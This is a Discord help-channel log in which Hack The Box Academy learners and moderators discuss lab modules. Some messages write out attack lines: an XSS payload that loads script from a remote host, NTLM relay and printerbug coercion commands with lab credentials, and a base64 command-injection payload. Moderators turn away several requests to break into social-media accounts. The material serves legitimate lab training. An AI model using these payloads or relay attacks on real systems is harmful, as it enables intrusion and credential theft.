I can actually rdp to it though

it worked @cloud urchin with the rockyou.txt file

Glad

To know

Glad it worked. Just as a FYI it's easier to transfer the hash (because it's like one line) to where the wordlist computer is and just crack it there.

@cloud urchin your reaction was fast than speed of light

@cloud urchin you are studying for next certification? Or on a break?

on break

What are doing next? Cape?

thats what i've done, its just that i have to wait some time between generating the target w11 and RDPing to it or else i have a connection issue

hi, someone can help me in XSS hicjacking

Thats not connection issue,thats because that your RDP computer has connected both pc..your kali vm and internal one...so it can talk to both

But your kali vm can only talk to rdp

And that one pc can only talk to rdp pc

So we are using RDP as a middle man

So convery our conversation with that internal pc

i prove all the payloads and nothing :)

Thats the error i get, i didnt know it was because of that but thank you for the knowledge $ xfreerdp /u:eagle\bob /p:Slavi123 /v:10.129.204.151 /dynamic-resolution

[15:36:55:453] [9815:9816] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[15:36:55:453] [9815:9816] [WARN][com.freerdp.crypto] - CN = WS001.eagle.local
[15:36:56:654] [9815:9816] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_NO_LOGON_SERVERS [0xC000005E] from server
[15:36:56:654] [9815:9816] [ERROR][com.freerdp.core.nla] - SPNEGO failed with NTSTATUS: STATUS_NO_LOGON_SERVERS [0xC000005E]
[15:36:56:654] [9815:9816] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_AUTHENTICATION_FAILED [0x00020009]
[15:36:56:654] [9815:9816] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[15:36:56:654] [9815:9816] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1

Try with " instead of '

lol no way. CAPE is pretty hard. maybe after more studying. probably going for cbbh next.

You are in clg right now?

clg?

But this ip should reached by your kali

College

oh, no

hemm, how?

never went to college

👀

"><script src=http://IP:8080/script.js></script>

if by "your kali" you mean "your Pwnbox" than yes thats the case

Yes

You are working right now?

yes. best to move the convo to general though. although i'm off break going back to work now.

it works!, can you explain me why pls

since you are talking certs, i'm curious, have you ever seen the "security certification roadmap" ? (https://pauljerimy.com/security-certification-roadmap/) do you think it has some accurracy ? I do not know how the author ranked the certifications tho

Yup okie

I've seen it. I really don't know about some of those certs, but he put CPTS below OSCP and PNPT which makes me question if he knows what he's talking about because CPTS is above both, easily.

😂

i only have CEH and CISSP so my knowledge is limited

Cpts is better than oscp and pnpt

Its superior

its just a diff payload depends what is happening behind the scenes
"> is just closing an exisitng attribute so just depends whether they used ' or " you have to close it with the same one

if that makes sense

feels like its price based (more expensive go up) but there are some exceptions. At least on the GRC side i know that CISSP is usually the highest thing one can be asked for when working in cybersecurity (that or any SANS certification, its the filter used by most HR)

So this error is not what i am trying to explain

thanks you so much bro

If I am doing AEN blind...within how much time should AEN be be completed...so you have an idea about your preperation

Idk I wouldn't think about it that way, just that if you can do the whole thing without looking at the module at all then you're most likely comfortable with the material and will be comfortable with the exam

I'm stuck on the last question of the kerberose attacks skills assesment. "The hint is If a user logs in, we can steal their identity." I've successfully done this but I can't do anything with the user. A nudge would be greatly appreciated.

If you have done this, you should be able to read the flag right?

hey i need help

broke into mine a bunch of times by clicking the "i forgot my password" button, then following the procedure

alzheimer is hitting sooner than expected 🙁

Hi

yeah that wont work i lost my acc 6 years ago

and i dont have access to anything email phone number nothing

contact support ?

that didnt work

thats why i searched for this server

You need a hacker

how do i find one im scared to get scammed

Yo have to pay for them

yeah thats not a problem but where do i find one

Try to find one in here

which type of witchcraft do you think people here can do that they get access to an account that you dont have a email, phone number or @ ?

@nova void We do not condone illegal activity in this server.

sorry i was just asking

telepathy ?

sybau

Contact instagram, that is your only recourse. Anyone telling you otherwise is scamming you.

Thats it

Greetings Everyone! I'm doing the Intro to Networks module and there're two questions I know I'm answering right but it's telling me otherwise. Has this happened before?

what a boomer feeling to have to google a word to find out its a new "young people expression" 😢

if the system is not accepting the answer, is because is wrong

I suggest reading the module again. Most of the time, is a little detail, that you're missing.

I have. Answer matches word for word. Questions 1 and 3. Which imo are the two simplest answers in the bunch.

It is usually a small detail.

Check again.

Hi there! Is there a problem on the target VMs ? It's been 15min spawning now

have you tried changing the VPN ?

Oh gosh I had to ask for it to work now

nvm it spawned 😅

anyone can help me please? I dont know why I get this error

hello everyone i am currently in the footprinting module at dns and i don't understand what to answer on the question ?

This may have worked already. If you look at the example provided in the material, it's the same as your output

If you don't see anything in ntlmrelayx, then maybe there's something wrong

Please refrain from posting content from modules above Tier 0. You can shape this in a question that doesn't spoil content though.

Have you updated your hosts file?

yes

Go ahead and DM your screenshot and some information and I'll see if anything sticks out.

I have an error with ntlmrelayx

ok

Hi.... please I'm trying to install knock subdomain on and I'm running into some issues. I have no idea what I'm doing

I'd appreciate it if anyone could be of assistance. Thank you

What htb academy module is this related to?

hey is there anyone that can maybe give me an extra resource for the footprinting dns module

i have read the entire section but still struggling with the excercises at the bottom

My apologies. This is not related to any module. I've tried checking online for a solution but nothing seems to be working and I don't understand why.
I just thought I could find some help here

Then this isnt the right channel to ask in. This channel is for help with https://academy.hackthebox.com modules. I suggest reading #welcome to see what the whole server is about. You should be able to post in #1024429874246590575

Alright thank you. Again my apologies

All the commands you need to solve the questions are already mentioned in the material

Yes I know but I seem to run into a problem with the first question I don’t get a answer but also no error
The second I did however find so it is kind of strange

Well. Sometimes you gotta dig a little deeper for records

Regarding the first question, you are interacting with the DNS server, and the question is asking you the FQDN for it. It may be clearer if I phrase it that way

Oh okay thanks for the help I will continue tomorow
Thanks for the hulp people

Password Attacks Pass the Certificate
I am receiving this error when using gettgtpkinit.py ?
Error Name: KRB_AP_ERR_SKEW Detail: "The clock skew is too great"

have you Google the error?

This message from the Kerberos authentication server appears if the difference in system time between the LDAP and IWSVA servers is too large (more than three or four minutes).

correct

and how do you fix that?

this goes back to how kerberos work

Your answer or what you have to do, relies on this: *"The clock skew is too great"

right Kerberos uses the timestamp as part of its method to issue tickets

Faketime utility can be used to spoof, but how to use with gettgtpkinit?

adjust the clock

On Kali

you can do that with tools, or manually

Again, if you Google the error, it will bring you to the same folks who face that issue and the tools they used

beautiful

can I drop the fix here for others?

timedatectl set-ntp off rdate -n [IP of Target]

Hello

Guess not lol

@vague ruin deleted your messages because they appeared wholly unrelated to the channel and just flooded it with nonsense

Ah that’s what was deleted lol

I just saw a wall go bye bye

Does anyone know if I can use the app from my mobile or if it is exclusive to PC?

You can use the academy on mobile, and it works fine. just not optimal imo

@fathom pendant how ??

So just a heads up. I was asking this question based on working on my phone. I went to my laptop and put the same answers in and they were accepted as correct.

you didn't provide any context as to what academy module you are working on;

I really miss the MD cheatsheet , easy to read

short answer: just use nxc it's literally the same as cme

also i consider not sharing screenshots that could contain credentials; always redact

especially since it's above tier 0

this is of course an interesting idea, but I would like to know what doesn't work) next time it might not work nxc in the same way

crackmapexec is no longer maintained, so there's very little reason to use it. NXC is the same tool maintained by the people that were responsible for crackmap's maintenance. They had a falling out with the CME repo owner (to put it politely)

there is a hash, not credentials..

a hash can still be used as credentials

:)

wow, I didn't know

i believe they're planning on eventually renaming the module

it's just not a priority in the pipeline

works great, why change anything) recognizable and short name)

well renaming the module to reference the tool netexec instead of crackmapexec

aaaaaah, I see what you meant. great, in that case the question is closed) everything works fine with NetExec

thanks)

think i have to send a msg in here

What have you tried so far and what is your concern regarding the exercise question?

Ok but finding the answer from the example was not the way to go.

Verified answer w current wordlist - just would have taken a while

I'm stuck on the Password stuffing section of the password attacks module. I already looked through all cnf files in /ect/mysql, didn't find a single thing. Also tried stuffing the sql server with default credentials from defaultcreds. Please give me some help.

default creds should work; first step should be to ssh into the server
syntax:

mysql -u <username> -p

[enter the password after prompted]
or

mysql -u <username> -p<password>

[note there's no space after -p, this is intentional]

Password Attacks Pass the Certificate
Getting Certificate ID when running ntlmrelayx but it is not writing to a file and has multiple errors lines 1043,42,82,113,68

nvm gpt fixed it

one of those is indeed correct; as i said. the first step is ssh into the system first with the given credentials

Do you mean sshing as root?

no

mb misread

yes, done that

@small scroll please take care not to post content from modules above tier 0.

where do i ask them then?

sigh

i don't recall changing too much from the example command aside from the ips

¯_(ツ)_/¯

make sure the target didn't die as well

whats the difference between having space after -p and not having space?

Hey Everyone, working on the Password Attacks module Attacking Windows Credential Manager exercise. I can switch to mcharles and found the Administrator password and can open CMD as Admin, but I don't see mimikatz or any of the other tools from the section. What am I missing?

the space makes mysql think the text you input is the database name

this is evident by the error

you'll need to transfer them over

Gotcha

oh, ty

with rdp targets i like adding /drive:/some/path/to/share,linux it gets mounted on the remote system under the share \\tsclient\linux

Thank you

@junior flicker got it solved? :)

Not yet, I'm just getting back into HTB, so clearing out the cobwebs, but I'll be good, I know how to move the files over, just didn't expect that I would have to

guys do I do the skills assessment tonight or tomorrow morn

sorry meant to at someone else @junior flicker 😓

all good?

No worries 😀

i mean if you wanna do it with a fresh mind or with stuff fresh on your mind. Also depends how frustrated or tired you already are and if you feel you need a break anyway

@fathom pendant why delete my msg

• spoiler text does nothing
• it revealed potential stuff about f1

OK!, u can help me ?

some things may be hidden in plain sight

there has to be space between -u and <username> right? I tried the default passwords and the given password on multiple accounts. Access denied.

I try to open my eyes wide...

I spawned a fresh target; ssh as sam; tried the correct pair of creds -> logged in

i suggest getting back to the first user and looking from there

we are talking about mysql right

yes

[that warning is telling me that using password on the command line is insecure]

did you use sam as the username?

thx

congrats

no; i used the associated username with the password in the default cred database

the database (cli tool) gives you
service | username | password

uh, what default database?

the default cred cheatsheet database

you shared its output earlier (it got yeeted bc the module is above t0)

https://tenor.com/view/coconut-hit-on-the-head-with-a-coconut-spongebob-patrick-gif-23859923

i got it, ty

it's a small list so at least it's simple :D

i thought i had to use the users on the machine

nope

first thing to generally try should be defaults

ty

how to do

@vernal jacinth this isn't that kind of server and that link requires someone to be logged in to facebook to view

Sorry this server isn't for random links to fb.

any option

not sure what you need help with because I didn't open the fb link. But this isn't a hacker for hire server, or a server to look for anything illegal

Are you asking,
"Will they teach about hacking on this server?"

that's not what i'm asking, is that what you're asking?

if so, then yes we do teach about legal hacking, not hacking into stuff like facebook or instagram or none of that nonsense

i suggest reading #welcome and #rules to see what this server is about

"Like doing it on Facebook and Instagram, right?"

no

i explicitly stated NOT hacking facebook or instagram

if that's what you're interested in doing, then this server isn't for you.

There aren’t any websites to hack Facebook and Instagram, right?

sigh that is ILLEGAL

so NO

#rules message rule 4. Keep it legal

Hey guys, just bought the vip for a month any roadmap or machines you recommend how can I make the best use of this

complete the paths that interest you the most

are you talking about vip related to https://app.hackthebox.com ? if so i'd make use of retired machines and writeups to learn what you can about the various things that may interest you. [as there's no vip for https://academy.hackthebox.com.]

Yeap the vip for htb labs

Alright then looking into the retired machine writeups

Just finished my Masters degree in Cyber, decided to hop into HTB this will be fun

also connect your htb account via the instructions in #welcome ; i also recommend giving this a read before just jumping straight to writeups https://www.hackthebox.com/blog/It-is-Okay-to-Use-Writeups

guys is this normal? why do i got 0 cube for few questions?

Each question shows you how many cubes you will get back.

its not some kind of limits on how much i could get or something then?? im using student subcription btw

No it's not a limit, it's just an arbitrary amount of cubes placed on each question which add up to be the cube refund mentioned in the module

ohh okay thanks

You get 20% of the cubes back from the cost of a module.
So if a module costs 100 cubes, you get 20 cubes back

Except tier 0. Which is 100%

Yeah sign up for hacker1 🤣🤣

jesus chirst what is this images quality of this module.

there a tool to depixel images try that maybe

lol

submit this to #1234357888114364508 (it's not just you)

Nice

you picked the wrong server my fren ~ big smoke

Ahhh

Am I banned now?

@granite vector this server isn't for finding out how to hack your ex's instagram. (if you want to know what this server is about feel free to read #welcome) but tl;dr you're not gonna learn how to do illegal shit here.
If you wanna learn hacking in a way that won't get you in legal trouble you're more than welcome to sign up for a hackthebox account https://hackthebox.com and start your journey there.
You can also link your account to the discord in order to see what else this server has to offer

reach out to the appropriate authorities

we cannot help

@granite vector as stated by @autumn pilot this is something for the authorities, this server isn't a hacker for hire server. At best it's more appropriate to find a Private Investigator in your area to help.

I understand thank you

on an unrelated note;
redoing the password attacks skill assessment and LMAO i completely missed the plaintext creds in the output blindness

Hi,
I’m trying the File Upload Attacks assessment and I’m stuck. I can upload files and see them in the upload folder, but my PHP never runs. I tried tricks like (valid) double extensions. and also adding PHP after a valid image, but the code still just shows up as text. Maybe I’m missing something basic? Any small hint would help a lot.
Thanks!

https://academy.hackthebox.com/module/147/section/1335 I need help, impacket-ntlmrelayx -t http://10.129.217.242/certsrv/certfnsh.asp --adcs --template 'EFS' -smb2support I used this command and then used python3 /usr/lib/python3/dist-packages/nxc/modules/coerce_plus.py --listener 10.10.16.42 INLANEFREIGHT.LOCAL\\wwhite:'package5shores_topher1'@10.129.217.242 but there is no output

Hello

there's not gonna be output until you tell something to attempt to connect to it. ntlmrelayx acts as a middleman

also i suggest using the template provided by the module

and the other stuff mentioned in the module, it'll make your life way easier

could someone help me in "privileged access" module in active directory enumeration and attacks

I reused the module's impacket-ntlmrelayx -t http://10.129.217.242/certsrv/certfnsh.asp --adcs -smb2support --template User and then used python3 /usr/lib/python3/dist-packages/nxc/modules/printerbug.py INLANEFREIGHT.LOCAL/wwhite:"package5shores_topher1"@10.129.217.242 10.10.16.42, but still no output.

I'm not sure how to fill in the "--template" value, but I did some research and it told me to select "enable=true" and "Enrollment Rights": [
"INLANEFREIGHT.LOCAL\Domain Admins",
"INLANEFREIGHT.LOCAL\Domain Users",
"INLANEFREIGHT.LOCAL\Enterprise Admins"
]

ask your query please

That's not the template refenced in the reading

you fill out the --template option with a valid template, you can discover templates with certipy

https://github.com/ly4k/Certipy/wiki/06-‐-Privilege-Escalation#esc8-ntlm-relay-to-ad-cs-web-enrollment

if you want to know what to look for with it; but again -- we are already given the information about which template to use by the reading

in this question "What other user in the domain has CanPSRemote rights to a host?" i got the user, b-----. Then for the next ques "What host can this user access via WinRM? (just the computer name)". i found a computer object's full sid which i resolved using "Get-ADComputer -Filter { ObjectSID -eq $sid } | Select-Object Name". but it turns out to be wrong answer

it's asking for just the hostname such as Academy-EA-Attack01

not Academy-EA-Attack01.inlanefreight.local

yea i entered that ACADEMY-EA-XXXX

make sure no extra spaces

i'd also try refreshing the page to be extra sure

wait I'll, try again just to be sure

Can someone here help me?

I used this impacket-ntlmrelayx -t http://10.129.217.242/certsrv/certfnsh.asp --adcs -smb2support --template "KerberosAuthentication" and python3 /usr/lib/python3/dist-packages/nxc/modules/printerbug.py INLANEFREIGHT.LOCAL/wwhite:"package5shores_topher1"@10.129.217.242 10.10.16.42 but still no output

make sure you're asking the dc01 for the callback, not the crtsrv

it is not the answer

give me a minute to sanity check

what section is this again?

privileged access

yep that is 100% not the right answer, look for other machines

i ran sharphound on the academy machine and transferred the result and ran bloodhound on my VM, does this method work?

Any one know a fix for the machine.htb now showing up on the website despite of adding in /etc/hosts and stuff?

yes, should work

Make sure to use the compatible version of sharphound as listed in the bloodhound-ce collectors if you're using the community edition

Hi,
I’ve asked the same question about the File Upload Attacks assessment twice in the last 24 hours and I haven’t received any answer. I am stuck and I just need a small hint to move forward. Could someone please take a moment to give me some guidance? Thanks.

not all php extensions are created equal

my notes state i had to do some experimentation to find the appropriate one

(god i love canvas lol)

i also noted (used an existing file image to craft a malicious file)

it should; the associated cypher query should display the machine

Weird i tried that for almost an hour and it didn't worked, even the queries in given in the module weren't working, now i ran bloodhound on the academy it got solved in 5 min

^

Can you be more specific? I tried for a while but still got no output.

you are given two ips

one is for the certificate/key server, the other is for the dc

Thanks. I did identify the PHP extension you mentioned, and I also tried by taking a normal image and adding PHP code inside it. The file uploads fine, but when I access it the PHP is never interpreted — it just shows up as plain text.

hello

you'll have to experiment a bit

a successful upload doesn't automatically mean it's going to execute

if you used burpsuite i'd look through the list of successful uploads (filter by size when looking at the requests)

@shell prawn be careful not to share answers in your screenshots

Okay

#modules message this is what helped me when i did it way back when

¯_(ツ)_/¯

Actually I am a newbie and I've spent about 2 hours on this question trying different prompts but I can't seem to find the correct answer

Thanks for taking the time to reply, but honestly your answer feels a bit esoteric to me.
I understand (and painfully experimented 🙂 ) that a successful upload doesn’t always mean execution, but I’m not sure what exactly I should be looking for in Burp when you say “filter by size.” Could you clarify a bit more what you mean?

burpsuite shows you the responses to the list attack

at the top bar you have the different columns, if you click it'll sort in ascending (or descending) size

This worked for me, I changed the original command and still got no output

10.129.217.242 (ACADEMY-PWATTCK-PTCDC01) ,10.129.142.171 (ACADEMY-PWATTCK-PTCCA01)

Hello I am in password attacks it pash the ticket attacks from windows module but I struggle . It says pass the ticket for user John but when I use mimikatz I don’t capture ticket for user John

try resetting the target; also with rubeus you can specify a user
rubeus dump /user:john if it doesn't exist then reset target

I realize now how valuable your hint was. Thanks a lot! 💪

looks like service account vs non-service

@quartz sundial careful of spoiling info for modules above tier 0 btw

I drawed all confidentional data like passes or hashes)

no disclosure)

even responses to queries can be telling

If it will be legitimate, if I blur images/commands?

Hi there, on module Command Injection, Advanced Command Obfuscation. I can't figure out how to get the command to work. Stuck for a day now. I used Base64 encoding, but nothing seems to work. Can anyone help me please?
`echo -n 'find /usr/share/ | grep root | grep mysql | tail -n 1' | base64
ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=

ip=127.0.0.1%0abash<<<$(base64%09-d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=)`

Hey guys i need some help on the the advanced xss and csrf exploitation module skills assessment, i managed to become a moderator but am stuck in trying to get a working xss payload via the file upload functionality and task management, i get blocked everytime by CSP..Kindly assist..

https://academy.hackthebox.com/module/67/section/605
how to do this section Print Operators of module Windows Privilege Escalation , its giveing so many errors , i sutck on it from 2-3 days. 🥲 , can u provie ur notes of this section Print Operatorsor how u did it .

whats the issue?

32 not wokring and when try to use 61 it saying to enter id:pass . that should not happen i guess , even i enter id pass it show product key activation error.

anyone knows how to do it ?

tbh, I didn't use the akagi64.exe for this. The module suggest you to load a vulnerable driver and use a different tool for gaining a privileged shell

if you load the vulnerable driver, the sugested tool should suffice

I guess its called exploitCapCom

not working ?

still error

SeLoadDriverPrivilege Failed not there

You will need to bypass UAC

with akagi64.exe ?

the module suggests using UACMe

and i don't recommend using tools not suggested by the module. this will only cause headache

https://github.com/hfiref0x/UACME this one ?

yeah

also delete your videos and try not to use them as it contains spoiler commands

done

in this repo akagi64.exe there nothing else

@tired flax heyy did you find a solution im stuck and need some help

Everything you need should be in C:\Tools unless you have already done it that way and are working on compiling and uploading them on your own.

Send me a DM telling me what you tried.

Guys I need help, the Pivoting and Tunelling module, skills assessment part. I'm unable to pivot using proxychains, whenever I bg the shell from the webserver and then try to use proxychains, it keeps dying. Any tips to keep it runnning and achieve pivoting?

does anyone know why nmap is taking so many time?

Do a -v and it will verbos and show you how long it will take

it is stopped as you see in my screenshot, no output shown

Can you ping it

it's still working

press any button - it will display progress

if you press any key it displays progress

7 minutes? is it possible?

yes

i'll try

ctrl + l should show your scan progress

in these cases i heavily suggest adding -sT to the command

Try sU lol that will be like 10hrs

@tribal lark

pressing any key shows progress, no need for key combos

it works, really really slow

i default to the right arrow key

Ctrl + c is the better one 🤣

If you have everything configured correctly and it it not working, try a different method from the module. If you exhaust all of the methods that will work with that you have available for pivoting, I recommend taking some time to learn how to configure and use ligolo for pivoting.

I guess printerbug is not working properly

So I would either download printerbug.py or you can try using the netexec module for funsies:

[*] coerce_plus module options:

        LISTENER       LISTENER for exploitation (default: 127.0.0.1)
        ALWAYS         Always continue to all exploit (default: False)
        METHOD         Exploit method (Petitpotam, DFSCoerce, ShadowCoerce, Printerbug, MSEven, All   default: All)
        M              Alias for METHOD
        L              Alias for LISTENER```

Also deleting this due to it spoiling content over Tier 0

@gray yacht @opal shuttle Thank you, it is indeed a problem with printerbug.py

https://academy.hackthebox.com/module/77/section/851

I cant seem to find the admin page mentioned in the lession

It mentions it in the README portion, but im not seeing it, Or im missing it

Am i the only one who comes across unstable machines for offensive module issues? For exmpl, on shell&payloads, the machines are up and then end up not responding, barely an nmap later.

no you are not the only one. hackthebox has many machines which have bugs

I just have the issue of HTB constantly setting off my antivirus lol

http://ip/nibbleblog/admin

Hello, the user and password list for the Attacking Common Services --> Email Services does not work, provided in the resources?

Add your notes folder to exceptions

Okay, ill try thank you

I dont recall it not working

Well, apparently it doesn't work for user enumeration of the domain specified in the task

Thank you, Could not see it in my README scan XD

Or at least I believe so, because there's only one command mentioned for that

did you add the -D domain?

yes

and did you use the username format user@domain ?

(assuming you got q1)

Ah, nvm, I got it, there was a small typo

a hacker's biggest weakness... spleling

righgt

This led me to an index page not the login portal, did I miss something else?

try admin.php 😉

oops thanks XD

I just notcied right as you sent it

I think one time I put inlanefright.htb

It is very scary

Tariffs

This question came to my mind after working with captive portal modules:
My captive portal shows my MAC/IP (192.168.101.135) and traffic stats (1136.6 MB up / 4.1 GB down). But I've seen claims that captive portal traffic numbers don't reflect real client consumption.
How is this possible? If the portal tracks my specific device, shouldn't the upload/ download numbers be accurate?
What technical reasons could cause captive portal statistics to be inflated or inaccurate compared to actual internet usage?

traffic can be measured by the router, and not your device. aside from that not sure other technical stuff (also that wouldn't be your MAC address)

Hey Guys,
i'm stuck on File Upload Module.. have upload a webshell with shell.php/.jpg, but cant it at /profile_images/shell.php/.jpg?cmd=id and /profile_images/.jpg?cmd=id too... i found in /.jpg?cmd=id just encrypted things, no result ...can anyone help me? when its not allowed to post the result then pm me pls

Hello.

Would appreciate a nudge on what's wrong with my payload on Advanced Deserialization Attacks: JSON

null bytes and weird extension stuff is a pain

yeah i ts wierd 😄

i suggest trying something else

but burp in truder says successfully, so anyw her e it must be

need it maybe for cbbh exam..

just because it's successful, doesn't mean it's useful

thats right.. but it doenst help me

😄

there is a double extension

i will try it tomorrow my brain is shutting down

thx ^^

Captive portal shows traffic counted by router (firewall rule, or before NAT), but it is different from the Wireshark that I measured on the client.

not sure the relevance though to a module? got a link to the module/section you're working on? ¯_(ツ)_/¯

Directly not relevant, but I need to know if there might be an attack vector in a captive portal that we can use to reset our traffic.

Module: File Inclusion
Lesson: PHP wrappers

Question: Try to gain RCE using one of the PHP wrappers and read the flag at /

After I check PHP configurations, and encode the PHP web shell to base64, I'm a bit lost as to what comes next. I'm trying to use this command: curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"

A little nudge?

use a different wrapper; expect isn't enabled

got the flag, thanks

is there separate channel for pro labs

hi guys , how r you ?

in my browser i cant find storage unit in devtools

how can i see ?

Yes #1263635449335910531 and if you don't have access follow the steps in #welcome , read over #rules, and check out #faq.

I am on the Nessus vuln scanning module. I have connected to the target via ssh, but when I use dpkg, it says it's not found. Am I supposed to do this a different way?

Oh ok nevermind I tried something ippsec usually does and it somehow worked, binge watching his vids has helped me again

Hi chat, how does one gains access to the off topic rooms ?

Follow the instructions in #welcome

i did the verication already. Isnt that what the green mark next to my name stands for ?

never mind, i only leaked my token...

now its done

Hi everyone im having trouble connecting to target machine using ssh, it always returns an error massage saying "Connection closed by <ip> port 22". what can i do to resolve this issue?

You must not be connected to the VPN

Download it and use “sudo openvpn <name.ovpn>” then try

or if your using Kali, you can import it as an openvpn connection profile. Thats what I did

Hi everyone. Having some issues with the Linux Privilege Escalation module, wondered if anyone could help?

I'm on the capabilities section. Every time I try to SSH in, I either get no response, or if I do manage to login my SSH window will lock up after about 10 seconds

This is happening both on PWNbox and on my own lab machine

Could anyone else confirm if it is happening to them as well, or if it's just something on my end

I had the same issue. I had to reset the machine 3 or 4 times to make it work

I've restarted it about 10 times by now

did you make sure your trying to change the right capability?

it returns he same issue even when connected to the vpn too

I can't even start changing any capabilties before the window locks up. it's and SSH connection issue I'm having trouble with

you may have to raise a trouble ticket if its happening as soon you connect. that shouldnt be happening

Not even a "host unreachable" response

Just no response at all

when they do come through the ping time is all over the place

maybe their network on that segmet is overloaded

Perhaps. I tried last night and Im trying again now, and its the exact same issue

seems pretty consistent

maybe try a lower utlized vpn server, just remember you will have to download a new vpn connection profile to your local box

I'm doing it through PWNbox

I'll try a different region though

ah, then maybe raise a trouble ticket so they are aware

Will do. thanks for your help, it's been driving me crazy

Ive ran into a few boxes where I just had to keep restarting them, Ive never used the PWNbox though

Yep, same issue with DE pwnbox that UK had. Must be an issue on their end

I'll raise a ticket

What interests you? Do you have any prior knowledge?

Hi, I'm trying to send a file from the target machine back to attack machine but I'm getting connection time out. Not sure what I'm doing wrong. Need some help ty

Did you just buy 5000 cubes outright?

Interesting choice

I mean nothing just that if you buy them monthly it’s $340 basically instead of $500

any help?

If you’re using xfreerdp to get into the machine just attach a folder as a drive and move it that way

yeah, but I want to figure out how to do it scp way

maybe machine has something against port 22

dumb question (but it happened to me), is the target there ?

I had some downloads getting stalled issues myself with scp. Can you try TCP Vpn incase you’re not on one already?

ladies and gents i have been stuck in ts for a good hour, any nudges please i used lazagne.exe it only viewed the Ubuntu login thingy, yet the answer is wrong

https://academy.hackthebox.com/module/147/section/1318

I officially hate windows

Why limit yourself to LaZagne?

well i used the findstr aswell , but it returned jack shit. If you have anything better by all means im happy to know

hi everyone i was just going through the Wi-Fi Password Cracking Techniques module and one of the questions ask me to use the OneRuleToRuleThemStill rule. first its not inside the rules directory or the current directory second when i want to copy the rule from github and paste it it just wont paste it and yes im in root anyone had such a problem? https://academy.hackthebox.com/module/312/section/3723

I believe all the tools/rules are in /opt

Guys hello am new in htb can someone pls help me how to connect to this cause i dont really know ty

Hello ! I am in password attacks in the pash the ticket from Linux chapter and I have a question about the last exercise (I mean the last mandatory one ) . Let’s say I have access to /etc/krb5.keytab . How can I impersonate a user ? Also how can I know who are the possible users I can impersonate ?

#welcome

If you have a user's ticket, you can impersonate them

But how ? I don’t understand the use of krb5.keytab

It does not work with the usual way of exporting it in the env variable

Whats that thats a server layout ?

Its the welcome channel

It gives all kind of information about the server, and even instructions to link your htb account to the server

The keytab is a key file, essentially, also iirc its initialized with kinit

iirc? So if I have access to a file I can impersonate anything inside it ?

How can I know all the possible users I can impersonate ?

Iirc -> if I recall correctly

The keytab file is for a specific user

Only for one user ? How can I know which one ? I mean his exact username ?

I believe the module goes over how to enumerate a keytab file

And dig into its principal info

No this file it’s different from the others

Reread the "abusing keytab files" subsection from the reading, it explains all to do

Hi guys, new to HTB. I've been working with Intro to Network Traffic Analysis and the questions is asking to use 'tcpdump' to save the file. I wrote it in the command line to save the file but it's been nearly an hour and it's still going...am I doing something wrong?

Well youre not gonna get much traffic to it...

Also you didnt specify the length so it'll capture until you tell it to stop

Password Attacks (Skills Assessment - Password Attacks)

Tips on pivoting to other internal machines after getting into the DMZ?
Ive tried establishing the SOCKS proxy to reach internal IPs but dont have proxychains
Does proxychains need to be moved to the machine? or is there another way?

I've also found creds for a user on an internal machine just cant reach it yet

Proxychains is only required on the host machine. Chisel server stuff is for the dmz host to connect back to you, then you use proxychains to do stuff from there. Alternatively look into ligolo-ng

when will we get the season 8 prizes?

It can take up to a few weeks to dole out all the prizes, I suggest reaching out to support for a better timeline (also unrelated to academy modules)

oh, sorry thought I'm typing in general

ligolo is so much better, why wasn't it mentioned in the module, I assume it gets covered deeper in Pivoting, Tunneling module?

not really, the tool came out well after the module was published

I see

if you have an annual sub, the writeup author actually uses ligolo for this

I do indeed have the annual sub I just try to avoid looking at the writeup when i can

Ill allow it this time tho

i just more meant if you wanna dig into alternative methods or thoughts of doing it

it's doable with stuff like proxychains and chisel

does academy use community content, Like if I was to make a sweet guide on Ligolo would they use it in a module?

they generally don't use community content unless it's a script

they may add ligolo to the pivoting module, worth throwing a /feedback for it

I'll do that, is there a channel here that i could throw a ligolo guide into whenever I make it ?

#community-content

Hello There ,im solving Intro to C2 Operations with Sliver Module and iv been digging in the last question couldnt figure it out if anyone can give me hint or help me i will he glad

@merry mesa this isn't a hacker for hire server (see #rules )

Finally completed Password attacks

is finishing these in 15 days a reasonable time line ?

That was the OG goal to have up to SQLmap done by september

instead of focusing on speed of completion, i'd focus on understanding of the material

Yeah that is the goal but to stay on schedule I was just wondering

I have plenty time I want to take CPTS in january

and november/december are currently dedicated to doing boxes for muscle memory

so I may need to push boxes to only december and use novemember to wrap up the last few modules

Hey bro, can I DM you on questions about the Skill Assessment?

The first 3 will take some time most likely and then next 5 are quicker, I mean you can mostly just look at the estimates they give they are roughly accurate.
Someone else made a post as well with the time they spent per module compared to the estimates which I thought was cool. https://www.brunorochamoura.com/posts/road-to-cpts/

yep

"The Password Attacks module was the big outlier, taking a whopping 144% more time than estimated. And that’s not counting the wait time during brute force attacks, which added even more. That module was a real drag."

Glad I am not the only one

Yep, same for me took longer then the estimated time, everything else was roughly accurate or usually took less time

fun fact; the password attacks module used to be worse on the time wasting -- the recent update cut out a significant amount of waiting

for the section using the firefoxdecrypt tool... you first had to find kira... yeah.... it wasn't great

I'm having some trouble with the skills assement for CME. I've tried rid-bruting and asreproasting the users. But I keep getting KDC_CLIENT_REVOKED. Then it just quits on me. Did anyone have the same error?

[Aug 14, 2025 - 22:37:24 (CDT)] exegol-default skillsassement # proxychains -q nxc ldap dc01.inlanefreight.local -u skusers.txt -p '' --asreproast skasreproast.out                                                         
LDAP        172.16.15.3     389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:INLANEFREIGHT.LOCAL) (signing:None) (channel binding:Never) 
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)

https://academy.hackthebox.com/module/84/section/1747

Does anyone know why I can only type here?

I can't even type in gen

Instructions are in #welcome to link your https://hackthebox.com account to the discord

Thank you

